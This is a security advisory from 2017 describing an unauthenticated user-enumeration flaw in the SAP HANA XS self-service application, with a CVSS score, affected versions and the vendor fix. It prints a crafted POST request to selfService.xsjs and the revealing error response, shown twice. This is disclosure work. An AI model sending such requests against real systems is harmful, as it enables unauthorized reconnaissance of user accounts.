December 13, 2017

[ERPSCAN-17-052] Information disclosure in SAP HANA XS classic user self-service

Information Disclosure vulnerability, SAP HANA Security

Application: SAP HANA
Versions Affected: SAP HANA SPS12, SPS10, SAP HANA 2.0
Vendor URL: SAP
Bug: Information Disclosure
Reported: 20.06.2017
Vendor response: 21.06.2017
Date of Public Advisory: 12.12.2017
Reference: SAP Security Note 2549983
Author: Mikhail Medvedev (ERPScan)

VULNERABILITY INFORMATION

Class: Information Disclosure
Risk: Medium
Impact: loss of information and system configuration confidentiality
Remotely Exploitable: Yes
Locally Exploitable: No

CVSS Information

CVSS v3 Base Score: 5.3 / 10
CVSS Base v3 Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unchanged (U)
C: Impact to Confidentiality	Low (L)
I: Impact to Integrity	None (N)
A: Impact to Availability	None (N)

DESCRIPTION

A remote unauthenticated attacker can get a user list in SAP HANA by abusing the request account functionality provided by the user self-service application.

BUSINESS RISK

An attacker can use Information disclosure vulnerability to reveal additional information (system data, debugging information, etc.), learn about a system and plan other attacks.

VULNERABLE PACKAGES

SAP HANA DATABASE 1.00 SP122
SAP HANA DATABASE 2.0 SP002
SAP HANA DATABASE 2.0 SP012
SAP HANA DATABASE 2.0 SP020

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2549983

TECHNICAL DESCRIPTION

Using error message an attacker can detect a HANA users.

REQUEST:
        POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
        Host: host:port
        Content-Length: 87
        Connection: close

        {"action":"createNewUser","username":"<username>/**/","email":"","x-sap-origin-location":""}

    RESPONSE:
        HTTP/1.1 500 Internal Server Error
        content-type: text/plain; charset=utf-8
        content-length: 140
        cache-control: no-cache
        expires: Thu, 01 Jan 1970 00:00:00 GMT
        date: Wed, 26 Apr 2017 10:21:43 GMT

        {"name":"SystemError","message":"dberror(Connection.prepareStatement): 331 - user name already exists: <username>: line 1 col 24 (at pos 23)"}

REQUEST:

POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1

Host: host:port

Content-Length: 87

Connection: close

{"action":"createNewUser","username":"<username>/**/","email":"","x-sap-origin-location":""}

RESPONSE:

HTTP/1.1 500 Internal Server Error

content-type: text/plain; charset=utf-8

content-length: 140

cache-control: no-cache

expires: Thu, 01 Jan 1970 00:00:00 GMT

date: Wed, 26 Apr 2017 10:21:43 GMT

{"name":"SystemError","message":"dberror(Connection.prepareStatement): 331 - user name already exists: <username>: line 1 col 24 (at pos 23)"}